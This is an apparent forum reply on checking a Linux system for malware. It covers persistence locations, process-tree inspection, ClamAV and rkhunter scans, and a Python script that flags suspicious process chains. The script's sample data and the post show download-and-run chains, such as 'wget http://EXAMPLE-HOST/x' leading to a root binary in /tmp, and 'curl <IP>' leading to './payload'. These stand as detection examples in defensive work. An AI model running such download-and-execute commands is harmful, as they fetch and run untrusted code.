Malware will want persistence, so let us look into:
- ~/.config/autostart/ (XDG autostart entries)
- ~/.bashrc / ~/.zshrc injection
- Systemd user services (~/.config/systemd/user/)
- Root-level services (/etc/systemd/system/)
- Cron jobs (crontab -e, sudo crontab -e)
- /usr/local/bin shadow binaries
Anything fishy there? Any cron jobs you don't recognize? Any shadow bins? Anything weird injected into your confs?
What about process chains? Does anything look strange, like a parent spawning weird shit that makes no sense to you?
Process tree:
- pstree -a -p
Look for wild shit such as:
- makepkg → gcc → wget → /tmp/a.out → runs as root
- xdg-open readme.eml → bash → curl <IP> → ./payload
History of execution for today
- journalctl _COMM=exe -S today
- ausearch -m execve --success yes
Let us get desperate with AVs/rootkit finders
- sudo pacman -S clamav
- sudo freshclam
- clamscan -r --bell -i /home /tmp /var/tmp
- clamscan -r -i / (if you realllly want to check everything)
And rootkit
- sudo pacman -S rkhunter
- sudo rkhunter --update
- sudo rkhunter --check
But if you want my honest take? It's just HTML injection from some janky package that you have. List your installed packages and go through each one; you 100% have stuff you installed at 4:38AM and just forgot.
Honestly, at this point, save your dot files and nuke it. You WILL spiral from this very hard.
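As an added example (not from the original post), here is a small Python script that applies the process-chain heuristics from the post to a snapshot in ps -eo pid,ppid,user,comm,args form: binaries run out of temp dirs or a relative path, and downloaders spawned under build tools or document handlers. The SAMPLE rows and the EXAMPLE-HOST name are constructed, not a real capture.

```python
"""Flag suspicious process chains using the heuristics from the post.
Added example, not from the original post; SAMPLE and EXAMPLE-HOST are
constructed. Rows mirror `ps -eo pid,ppid,user,comm,args` output."""
# Vocabulary taken from the two chains quoted in the post.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"wget", "curl"}
ODD_PARENTS = {"makepkg", "gcc", "xdg-open"}  # build tools / doc handlers

def ancestry(pid, procs):
    """Return the chain root -> pid as a list of process dicts."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)  # guard against a malformed snapshot with cycles
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    return chain[::-1]

def flag_chains(rows):
    """rows: iterable of (pid, ppid, user, comm, args).
    Returns [(reason, 'comm(pid)->comm(pid)...'), ...] in snapshot order."""
    procs = {pid: dict(pid=pid, ppid=ppid, user=user, comm=comm, args=args)
             for pid, ppid, user, comm, args in rows}
    findings = []
    for p in procs.values():
        chain = ancestry(p["pid"], procs)
        parents = {c["comm"] for c in chain[:-1]} & ODD_PARENTS
        path = p["args"].split(" ", 1)[0]  # argv[0] as ps shows it
        label = "->".join(f"{c['comm']}({c['pid']})" for c in chain)
        if path.startswith(TEMP_DIRS):
            suffix = " as root" if p["user"] == "root" else ""
            findings.append(("binary executed from temp dir" + suffix, label))
        elif path.startswith("./"):
            findings.append(("relative-path binary executed", label))
        elif p["comm"] in DOWNLOADERS and parents:
            findings.append(("downloader spawned under " + ", ".join(sorted(parents)), label))
    return findings

# Constructed sample modelled on the chains quoted in the post.
SAMPLE = [
    (900, 1, "alice", "bash", "bash"),
    (901, 900, "alice", "makepkg", "/usr/bin/makepkg -si"),
    (902, 901, "alice", "gcc", "gcc -o a.out a.c"),
    (903, 902, "alice", "wget", "wget http://EXAMPLE-HOST/x"),  # placeholder host
    (904, 903, "root", "a.out", "/tmp/a.out"),
    (950, 900, "alice", "xdg-open", "xdg-open readme.eml"),
    (951, 950, "alice", "bash", "bash -c curl"),
    (952, 951, "alice", "curl", "curl http://EXAMPLE-HOST/p"),
    (953, 952, "alice", "payload", "./payload"),
]
```

Feed it real rows by parsing ps output into the same tuples; anything it flags is a chain worth reading by hand, not proof of compromise on its own.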